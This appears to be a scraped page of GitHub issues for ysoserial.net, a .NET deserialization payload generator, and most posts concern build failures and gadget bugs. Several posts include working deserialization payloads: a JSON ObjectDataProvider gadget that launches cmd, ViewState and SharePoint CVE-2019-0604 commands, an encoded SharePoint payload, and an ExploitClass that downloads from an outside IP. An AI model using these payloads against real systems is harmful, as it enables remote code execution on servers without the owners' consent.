at DatingApp.API.Controllers.DeserializationController.Deserialize(Info value2) in D:\DeserializationController.cs:line 73
at lambda_method(Closure , Object , Object[] )
at Microsoft.Extensions.Internal.ObjectMethodExecutor.Execute(Object target, Object[] parameters)
at Microsoft.AspNetCore.Mvc.Infrastructure.ActionMethodExecutor.SyncActionResultExecutor.Execute(IActionResultTypeMapper mapper, ObjectMethodExecutor executor, Object controller, Object[] arguments)
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.InvokeActionMethodAsync()
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.Next(State& next, Scope& scope, Object& state, Boolean& isCompleted)
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.InvokeNextActionFilterAsync()
--- End of stack trace from previous location where exception was thrown ---
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.Rethrow(ActionExecutedContextSealed context)
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.Next(State& next, Scope& scope, Object& state, Boolean& isCompleted)
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.InvokeInnerFilterAsync()
--- End of stack trace from previous location where exception was thrown ---
at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.<InvokeFilterPipelineAsync>g__Awaited|19_0(ResourceInvoker invoker, Task lastTask, State next, Scope scope, Object state, Boolean isCompleted)
at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.<InvokeAsync>g__Logged|17_1(ResourceInvoker invoker)
at Microsoft.AspNetCore.Routing.EndpointMiddleware.<Invoke>g__AwaitRequestTask|6_0(Endpoint endpoint, Task requestTask, ILogger logger)
at Microsoft.AspNetCore.Authorization.AuthorizationMiddleware.Invoke(HttpContext context)
at Microsoft.AspNetCore.Authentication.AuthenticationMiddleware.Invoke(HttpContext context)
at Microsoft.AspNetCore.Diagnostics.DeveloperExceptionPageMiddleware.Invoke(HttpContext context)
Update Outdated Dependencies
Many dependencies of this project are now long longer supported, have been removed from NuGet for the version specified, or contain security issues in the version used. It would likely be a good idea to go a run through of all of the dependencies and update the project to use more modern versions where applicable or find suitable replacements where the project is no longer maintained.
DLLs missing from latest release
The latest release (31) is missing half of the required DLLs so the program just crashed when you try and run it. Finally realised this after looking at a previous release and finding it had a few more DLLs in.
cant running on Kali Linux
Hello, I download the master-Release-26
Unzip it and the chmod +x ysoserial.exe
But get the error
Unhandled Exception: System.Reflection.ReflectionTypeLoadException: Exception of type 'System.Reflection.ReflectionTypeLoadException' was thrown. Could not load file or assembly 'System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies. at (wrapper managed-to-native) System.Reflection.Assembly.GetTypes(System.Reflection.Assembly,bool) at System.Reflection.Assembly.GetTypes () [0x00000] in <d0e12f672b88444ab4b6d9b2ecf20142>:0 at ysoserial.Program+<>c.<Main>b__11_0 (System.Reflection.Assembly s) [0x00000] in <8eb34f80e7574b5f9f3f1f7b0e92d8f7>:0 at System.Linq.Enumerable+SelectManySingleSelectorIterator2[TSource,TResult].MoveNext () [0x0005f] in <13c0993ff82548209b09f271bd5e6a78>:0
at System.Linq.Enumerable+WhereSelectEnumerableIterator2[TSource,TResult].ToList () [0x00041] in <13c0993ff82548209b09f271bd5e6a78>:0 at System.Linq.Enumerable.ToList[TSource] (System.Collections.Generic.IEnumerable1[T] source) [0x00021] in <13c0993ff82548209b09f271bd5e6a78>:0
at ysoserial.Program.Main (System.String[] args) [0x00132] in <8eb34f80e7574b5f9f3f1f7b0e92d8f7>:0
System.IO.FileNotFoundException: Could not load file or assembly 'System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies.
File name: 'System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
[ERROR] FATAL UNHANDLED EXCEPTION: System.Reflection.ReflectionTypeLoadException: Exception of type 'System.Reflection.ReflectionTypeLoadException' was thrown.
Could not load file or assembly 'System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies.
at (wrapper managed-to-native) System.Reflection.Assembly.GetTypes(System.Reflection.Assembly,bool)
at System.Reflection.Assembly.GetTypes () [0x00000] in :0
at ysoserial.Program+<>c.
at System.Linq.Enumerable+SelectManySingleSelectorIterator
2[TSource,TResult].MoveNext () [0x0005f] in <13c0993ff82548209b09f271bd5e6a78>:0 at System.Linq.Enumerable+WhereSelectEnumerableIterator2[TSource,TResult].ToList () [0x00041] in <13c0993ff82548209b09f271bd5e6a78>:0at System.Linq.Enumerable.ToList[TSource] (System.Collections.Generic.IEnumerable
1[T] source) [0x00021] in <13c0993ff82548209b09f271bd5e6a78>:0 at ysoserial.Program.Main (System.String[] args) [0x00132] in <8eb34f80e7574b5f9f3f1f7b0e92d8f7>:0 System.IO.FileNotFoundException: Could not load file or assembly 'System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies. File name: 'System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
uname -a
5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux
n/a
Gadgets for .NET 2
Handling gadgets that don't result in command execution
(Ideally I'd start a discussion for this, but I don't believe that's enabled for this repository.)
Currently Ysoserial.NET primarily works to support generation of gadget payloads that execute a command on deserialization. There are some exceptions to this rule as some gadgets allow you to specify files and there is a plugin option to handle special cases for specific technologies.
I've been doing quite a lot of research recently into different types of gadgets that would allow a researcher to generate payloads that can perform other useful actions, such as exfiltrating files via XXE gadget chains during deserialization. I've even got a PoC that works on .NET Core and .NET 7, utilizing the serializer to bypass the default XML parsing security configurations introduced in .NET 4.5.2.
I believe there is probably some interest in being able to generate these, but I'm not sure what the consensus would be on how to approach it with respect to listing the gadgets and avoiding cluttering the command line options.
How to build exe in linux
Do you have instructions on how to build the exe in linux?
Donetnuke plugin wrong mode name
This plugin -h mentioned mode upload_file, but what actually used is write_file
{"m|mode=", "the payload mode: read_file, upload_file, run_command.", v => mode = v },
if (mode == "write_file" && path != "" & url != "")
Integrate into Zaproxy?
This tool could be really awesome if it will be integrated into Zap - using it to attack/tests web app will be a lot easier. I've opened an issue (zaproxy/zaproxy#4112) - so feel free to join the discussion...
Error in minifying large data for BinaryFormatter
There is a bug in Calculate7BitEncodedInt that does not support large data. This can cause issue when minifying BinaryFormatter/LosFormatter payloads.
The affected function needs to be rewritten based on https://referencesource.microsoft.com/#mscorlib/system/io/binarywriter.cs,2daa1d14ff1877bd,references
Unable to cast object of type 'System.Windows.Data.ObjectDataProvider' to type 'System.Windows.Media.Brush'
I test debugging ysoserial.net source code with options -f BinaryFormatter -o base64 -c 'calc' -g WindowsClaimsIdentity --test to see if the gadget works.
I always get this error: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Runtime.Serialization.SerializationException: ID4282: There was an error deserializing a new 'WindowsClaimsIdentity' instance. ---> System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.InvalidCastException: Unable to cast object of type 'System.Windows.Data.ObjectDataProvider' to type 'System.Windows.Media.Brush'
To be sure, I have cleaned and rebuilt the project before each run:
However, when I run the built file source\ysoserial\bin\Debug\ysoserial.exe then it works!?
So What does this error means? and Why deserializing when debug project raise the error?
Question on assessment - Value cannot be null.Parameter name: type
Hello,
I definitely have situation where an app i am assessing is allowing __type declaration but no matter what i attempt with payloads i get the same response if i include any value for __type. Not looking for help exploiting this for my assessment, just some direction. All of the research I've done is showing this should be exploitable. Kind of want to know what the next step could be in discovery of whether or not this is exploitable but i hit a wall on the __type null problem. MVC 3
I have used Freddy which is certain there is a problem here.
ysoserial.exe -c "nslookup SCRUBBED.burpcollaborator.net" -g ObjectDataProvider -f JavaScriptSerializer
And I'm sending this payload to the target and can't get anything to run, it's a windows box.
Payload that does the detection looks like (or similar) - I can insert null and then i get an error message saying it wants a true or false for another parameter, which I've also tried appending but s till get the error about type not being null.
{"__type":""}
Error looks like this:
`HTTP/1.1 500 Internal Server Error
Date: Mon, 20 Apr 2020 15:49:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9702
Connection: close
Cache-Control: private
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, PUT, POST, DELETE, HEAD
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Parameter name: type</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; } } </style>
Server Error in '/SCRUBBED' Application.
Value cannot be null.
Parameter name: type
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.ArgumentNullException: Value cannot be null.
Parameter name: type
Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.
|
Stack Trace:
|
Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3535.0 `
XMLMinifier removing needed variables
The XLST in the XMLMinifier is removing needed variables for the datacontractserializer formatter when using the WindowsPrinciple gadget.
This is a reminder for @irsdl to patch the XSLT to give the option of removing the variables or not and/or only remove the variables if not in use.
The problem of deserializing AES\3DES in Viewstate
Hello!
Viewstate, generate a payload encrypted as AES and 3DES, and the test cannot be deserialized. The query data is (if the signature algorithm is aes/3des, no matter whether the encryption function is enabled or not, we just need to sign the data first, encrypt it again, and then sign it again as mentioned earlier. Then send it to the server, asp.net enters getdecodeddata(), and then encryptordecryptdata() first for verification and decryption, and then verify it again after coming out.), How to solve this problem? There are also lower versions of V2 Net2.0viewstate deserialization how should I use the chain?
Attempted code
ysoserial. exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/hello.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="xxxxxxxxxx" --validationalg="AES" --validationkey="xxxxxxxxxx"
ysoserial. exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/hello.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="xxxxxxxxxx" --validationalg="3DES" --validationkey="xxxxxxxxxx"
[Most Likely User Error] Cannot Execute ActivitySurrogateSelectorFromFile
Hello there,
I'm hoping you can help me out. As noted in the title, this is likely just me not understanding the tool well enough. I'm trying to use the ActivitySurrogateSelectorFromFile formatter, with the ObjectStateFormatter gadget. As noted in the readme, I've provided the .cs file as well as the additional assemblies required.
I am using a modified ExploitClass.cs that does the following:
using System;
//using System.Windows.Forms;
using System.Net;
using System.IO;
namespace ysoserial
{
class ExploitClass
{
public ExploitClass()
{
try
{
// Payload code to be executed
//MessageBox.Show("Pwned", "Pwned", MessageBoxButtons.OK, MessageBoxIcon.Error);
WebClient Client = new WebClient();
Client.DownloadFile("http://123.123.123.123:9000", Path.GetTempPath()+"\\pwnd.txt");
}
catch (Exception)
{
}
}
}
}
After building the project, and trying to execute it from the .\bin\Debug\ folder I got this error:
C:\workspace\bb\ysoserial.net\ysoserial\bin\Debug>ysoserial.exe -f ObjectStateFormatter -g ActivitySurrogateSelectorFromFile -o base64 -c "ExploitClass.cs;System.Net;System.IO" -t
Unhandled Exception: System.IO.FileNotFoundException: Could not find file 'C:\workspace\bb\ysoserial.net\ysoserial\bin\Debug\ExploitClass.cs'.
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share)
at Microsoft.CSharp.CSharpCodeGenerator.System.CodeDom.Compiler.ICodeCompiler.CompileAssemblyFromFileBatch(CompilerParameters options, String[] fileNames)
at System.CodeDom.Compiler.CodeDomProvider.CompileAssemblyFromFile(CompilerParameters options, String[] fileNames)
at ysoserial.Generators.PayloadClassFromFile..ctor(String file) in C:\workspace\bb\ysoserial.net\ysoserial\Generators\ActivitySurrogateSelectorFromFileGenerator.cs:line 23
at ysoserial.Generators.ActivitySurrogateSelectorFromFileGenerator.Generate(String file, String formatter, Boolean test) in C:\workspace\bb\ysoserial.net\ysoserial\Generators\ActivitySurrogateSelectorFromFileGenerator.cs:line 48
at ysoserial.Program.Main(String[] args) in C:\workspace\bb\ysoserial.net\ysoserial\Program.cs:line 117
Which tells me it (of course) couldn't find ExploitClass.cs in the folder. At first I tried just copying my modified ExploitClass.cs into .\bin\Debug\, but that didn't seem to work:
C:\workspace\bb\ysoserial.net\ysoserial\bin\Debug>ysoserial.exe -f ObjectStateFormatter -g ActivitySurrogateSelectorFromFile -o base64 -c "ExploitClass.cs;System.Net;System.IO" -t>tmp.txt
Metadata file 'System.Net' could not be found
Metadata file 'System.IO' could not be found
I also tried copying the compiled ysoserial.exe into the main project folder and executing from there:
C:\workspace\bb\ysoserial.net\ysoserial\bin\Debug>copy ysoserial.exe ..\..\ysoserial.exe
1 file(s) copied.
C:\workspace\bb\ysoserial.net\ysoserial\bin\Debug>cd ..\..\
C:\workspace\bb\ysoserial.net\ysoserial>ysoserial.exe -f ObjectStateFormatter -g ActivitySurrogateSelectorFromFile -o base64 -c "ExploitClass.cs;System.Net;System.IO" -t>tmp.txt
Unhandled Exception: System.IO.FileNotFoundException: Could not load file or assembly 'NDesk.Options, Version=0.2.1.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. The system cannot find the file specified.
at ysoserial.Program.Main(String[] args)
Any ideas?
SharePoint CVE-2019-0604 plugin ampersand character (&) bug
Hi,
When command contains & character, the ysoserial.net will generate broken payload.
I used the following command:
ysoserial --cve=CVE-2019-0604 --command="dir && nslookup xst82rx7czaogsnnk8tuq6gpzg56tv.burpcollaborator.net" -p SharePoint
__bp837135009700370047005600d600e2004400160047001600e20035005600270067009600360056003700e2009400e600470056002700e6001600c600e2005400870007001600e600460056004600750027001600070007005600270006002300b500b50035009700370047005600d600e20075009600e6004600f60077003700e200d40016002700b60057000700e20085001600d600c600250056001600460056002700c20005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c20065005600270037009600f600e600d3004300e2000300e2000300e2000300c20034005700c6004700570027005600d300e60056005700470027001600c600c200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500c200b50035009700370047005600d600e20075009600e6004600f60077003700e2004400160047001600e200f4002600a600560036004700440016004700160005002700f60067009600460056002700c20005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c20065005600270037009600f600e600d3004300e2000300e2000300e2000300c20034005700c6004700570027005600d300e60056005700470027001600c600c200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500d500c20035009700370047005600d600e2004400160047001600e20035005600270067009600360056003700c20065005600270037009600f600e600d3004300e2000300e2000300e2000300c20034005700c6004700570027005600d300e60056005700470027001600c600c200050057002600c60096003600b400560097004500f600b6005600e600d3002600730073001600530036005300630013009300330043005600030083009300a300c3005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700d600c600e6003700a3001600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d6001600d2009600e600370047001600e60036005600220002008700d600c600e6003700a3002600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d60016002200e300c3005400870007001600e6004600560046005400c6005600d6005600e6004700f200e300c30005002700f600a6005600360047005600460005002700f600070056002700470097000300e300c300d400560047008600f6004600e4001600d6005600e30005001600270037005600c300f200d400560047008600f6004600e4001600d6005600e300c300d400560047008600f60046000500160027001600d60056004700560027003700e300c3001600e6009700450097000700560002001600a3004700970007005600d30022002600a3003700470027009600e60076002200e3006200c6004700b300250056003700f600570027003600560044009600360047009600f600e60016002700970002008700d600c600e6003700d300620017005700f6004700b3008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600f20007002700560037005600e6004700160047009600f600e600620017005700f6004700b30002008700d600c600e6003700a3008700d300620017005700f6004700b3008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600620017005700f6004700b30002008700d600c600e6003700a3003600d300620017005700f6004700b3003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600b3001600370037005600d6002600c6009700d300d60037003600f6002700c60096002600620017005700f6004700b30002008700d600c600e6003700a3004600d300620017005700f6004700b3003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600e2004400960016007600e600f60037004700960036003700b3001600370037005600d6002600c6009700d30037009700370047005600d600620017005700f6004700b300620076004700b30002006200c6004700b300f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700a300b40056009700d300620017005700f6004700b300620017005700f6004700b3000200f4002600a6005600360047004500970007005600d300620017005700f6004700b300b7008700a300450097000700560002004600a30005002700f6003600560037003700d700620017005700f6004700b3000200d400560047008600f6004600e4001600d6005600d300620017005700f6004700b30035004700160027004700620017005700f6004700b300620076004700b30002006200c6004700b300f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b30002006200c6004700b3003600a3003500470027009600e6007600620076004700b3003600d60046006200c6004700b300f2003600a3003500470027009600e6007600620076004700b30002006200c6004700b3003600a3003500470027009600e6007600620076004700b300f200360002004600960027000200620062000200e6003700c600f600f600b600570007000200870037004700830023002700870073003600a7001600f60076003700e600e600b6008300470057001700630076000700a70076005300630047006700e20026005700270007003600f600c600c60016002600f600270016004700f6002700e200e600560047006200c6004700b300f2003600a3003500470027009600e6007600620076004700b30002006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b30002006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700620076004700b30002006200c6004700b300f200250056003700f600570027003600560044009600360047009600f600e600160027009700620076004700b300c300f2001600e60097004500970007005600e300c300f200d400560047008600f60046000500160027001600d60056004700560027003700e300c300f4002600a6005600360047009400e600370047001600e6003600560002001600a3004700970007005600d300220085001600d600c6002500560016004600560027002200e300c300f200f4002600a6005600360047009400e600370047001600e60036005600e300c300f20005002700f600a6005600360047005600460005002700f600070056002700470097000300e300c300f2005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f60067009600460056002700e300
The payload won't execute on a vulnerable SharePoint. However, if I try nslookup without the && the payload will execute.
ArgumentNullException
Hi there,
I have this valid json request
{"IsSafeSearchEnabled":true,"IsSearchMonitorEnabled":true,"IsGoogleHttpsRedirectEnabled":false,"ExcludedEntities":[{"EntityType":0,"Name":"test"}]}
for executing the RCE I used this command
ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -o raw -c "calc" -t
{
'__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'ObjectInstance':{
'__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'StartInfo': {
'__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'FileName':'cmd',
'Arguments':'/c calc'
}
}
}
but getting this error, could you say what I did wrong?
[ArgumentNullException: Value cannot be null. Name of parameter: type]
System.Activator.CreateInstance(Type type, Boolean nonPublic) +11110602
System.Activator.CreateInstance(Type type) +66
System.Web.Script.Serialization.ObjectConverter.ConvertDictionaryToObject(IDictionary`2 dictionary, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object& convertedObject) +418
System.Web.Script.Serialization.ObjectConverter.ConvertObjectToTypeInternal(Object o, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object& convertedObject) +66
System.Web.Script.Serialization.ObjectConverter.ConvertObjectToTypeMain(Object o, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object& convertedObject) +145
System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth) +201
System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth) +393
System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth) +157
System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth) +393
System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth) +157
System.Web.Script.Serialization.JavaScriptObjectDeserializer.BasicDeserialize(String input, Int32 depthLimit, JavaScriptSerializer serializer) +78
System.Web.Script.Serialization.JavaScriptSerializer.Deserialize(JavaScriptSerializer serializer, String input, Type type, Int32 depthLimit) +44
System.Web.Mvc.JsonValueProviderFactory.GetDeserializedObject(ControllerContext controllerContext) +210
System.Web.Mvc.JsonValueProviderFactory.GetValueProvider(ControllerContext controllerContext) +16
System.Web.Mvc.<>c__DisplayClassc.<GetValueProvider>b__7(ValueProviderFactory factory) +34
System.Linq.WhereSelectEnumerableIterator`2.MoveNext() +157
System.Linq.WhereSelectEnumerableIterator`2.MoveNext() +183
System.Collections.Generic.List`1..ctor(IEnumerable`1 collection) +460
System.Linq.Enumerable.ToList(IEnumerable`1 source) +58
System.Web.Mvc.ValueProviderFactoryCollection.GetValueProvider(ControllerContext controllerContext) +260
System.Web.Mvc.ControllerBase.get_ValueProvider() +25
System.Web.Mvc.ControllerActionInvoker.GetParameterValue(ControllerContext controllerContext, ParameterDescriptor parameterDescriptor) +62
System.Web.Mvc.ControllerActionInvoker.GetParameterValues(ControllerContext controllerContext, ActionDescriptor actionDescriptor) +105
System.Web.Mvc.Async.<>c__DisplayClass25.<BeginInvokeAction>b__1e(AsyncCallback asyncCallback, Object asyncState) +445
System.Web.Mvc.Async.WrappedAsyncResult`1.Begin(AsyncCallback callback, Object state, Int32 timeout) +129
System.Web.Mvc.Async.AsyncControllerActionInvoker.BeginInvokeAction(ControllerContext controllerContext, String actionName, AsyncCallback callback, Object state) +302
System.Web.Mvc.<>c__DisplayClass1d.<BeginExecuteCore>b__17(AsyncCallback asyncCallback, Object asyncState) +30
System.Web.Mvc.Async.WrappedAsyncResult`1.Begin(AsyncCallback callback, Object state, Int32 timeout) +129
System.Web.Mvc.Controller.BeginExecuteCore(AsyncCallback callback, Object state) +338
System.Web.Mvc.Async.WrappedAsyncResult`1.Begin(AsyncCallback callback, Object state, Int32 timeout) +129
System.Web.Mvc.Controller.BeginExecute(RequestContext requestContext, AsyncCallback callback, Object state) +316
System.Web.Mvc.Controller.System.Web.Mvc.Async.IAsyncController.BeginExecute(RequestContext requestContext, AsyncCallback callback, Object state) +15
System.Web.Mvc.<>c__DisplayClass8.<BeginProcessRequest>b__2(AsyncCallback asyncCallback, Object asyncState) +71
System.Web.Mvc.Async.WrappedAsyncResult`1.Begin(AsyncCallback callback, Object state, Int32 timeout) +129
System.Web.Mvc.MvcHandler.BeginProcessRequest(HttpContextBase httpContext, AsyncCallback callback, Object state) +251
System.Web.Mvc.MvcHandler.BeginProcessRequest(HttpContext httpContext, AsyncCallback callback, Object state) +48
System.Web.Mvc.MvcHandler.System.Web.IHttpAsyncHandler.BeginProcessRequest(HttpContext context, AsyncCallback cb, Object extraData) +16
System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +301
System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) +155
at the server deserialize code like this
JavaScriptSerializer jsonSerializer = new JavaScriptSerializer();
System.Collections.Generic.Dictionary<string, string> data = jsonSerializer.Deserialize<System.Collections.Generic.Dictionary<string, string>>(requestBody);
thank you
Help on how to build.
Please am trying to build the v2 branch for an old asp.net server i came across.
Please help with guide on how to build.
Unhandled exception
Powershell on Debian Linux
Unhandled Exception:
System.NullReferenceException: Object reference not set to an instance of an object
at ysoserial.Generators.TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget (System.String cmd) [0x000ad] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
at ysoserial.Generators.TypeConfuseDelegateGenerator.Generate (System.String cmd, System.String formatter, System.Boolean test, System.Boolean minify) [0x00000] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
at ysoserial.Program.Main (System.String[] args) [0x00339] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.NullReferenceException: Object reference not set to an instance of an object
at ysoserial.Generators.TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget (System.String cmd) [0x000ad] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
at ysoserial.Generators.TypeConfuseDelegateGenerator.Generate (System.String cmd, System.String formatter, System.Boolean test, System.Boolean minify) [0x00000] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
at ysoserial.Program.Main (System.String[] args) [0x00339] in <ea956b426eca4a2ea734dd6ba9ce1670>:0
Demo please !
Gadget not supported
I see README.md apply:
RolePrincipal
DataSet
ClaimsIdentity
but i run "ysoserial.exe -h", did not show above gaget, so i need some help. thank you.
Cannot compile TypeConfuseDelegate gadget
I've noticed that the class here is not referenced inside the VS Project. I tried to import and when compiling it give me errors:
error CS0117: 'Comparer' does not contain a definition for 'Create'
error CS0246: The type or namespace name 'SortedSet<>' could not be found (are you missing a using directive or an assembly reference?)
I've noticed that the class SortedSet is not present into .NET 2.0 and neither does Comparer.Create
Since this gadget should be smaller than ActivitySurrogateSelector, I'd like to compile and use it.
Is this class left outside the project on purpose? Is there a way to compile it and use on .NET 2.0 targets?
there is no any file present ysoserial.exe
there is no file present ysoserial.exe on this tool i didnt get this file any where how can i run this tool
Precompiled or Build Dependency guide
Precompiled or Build Dependency guide
Hey all, 2 questions really
is there a binary ?
I've installed visual studio 2019, while I could list the dependencies it's erroring on during build phase I have to ask, is there a dependency/build guide that I've ignored/overlooked ?
Payloads and black-box scanning
I've been working on implementing an insecure deserialization plugin for w3af https://github.com/andresriancho/w3af/blob/feature/deserialization/w3af/plugins/audit/deserialization.py . For now it is working with python, nodejs and java.
I'm trying to use ysoserial.net to generate the payloads which would be sent during an application scan. Something that worries me is the large number of payloads which can be generated using ysoserial.net
A dummy approach would be to generate all the possible payloads using all (gadget, formatter) combinations and send them all. That would (potentially) yield the highest test coverage, but will also take more time to send all the HTTP requests.
In order to reduce the number of HTTP requests to be sent I would like to understand:
- In which scenario would
(Gadget: ObjectDataProvider, Formatter: Json.net)work, and(Gadget: WindowsIdentity, Formatter: Json.net)not? - Same question for other combinations where the formatter is the same and the gadget changes
I'm sending the payloads to all parameters, sending them as-is and base64 encoded, sending them in query string, post-data, cookies.
Any other pointers on writing a black-box scanner for insecure .net deserialization?
This issue is related with #6
'-s' parameter doesn't work while using -p 'ViewState'
hi , I get a problem where I use ' -s ' with -p 'ViewState' together ,
and if i can't use '-s' while using "-p 'viewState'" ,how can i deal with the special character , my cmd command is :
Upload binary releases
Can you upload some binary releases and preferably targeting .NET 2.X ?
Gadgets for Mono?
Are there any gadgets out there for Mono? I'd be willing to implement them but I can't find any research into attacking deserialization on Mono, or Unity for that matter. Target platform is Windows.
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.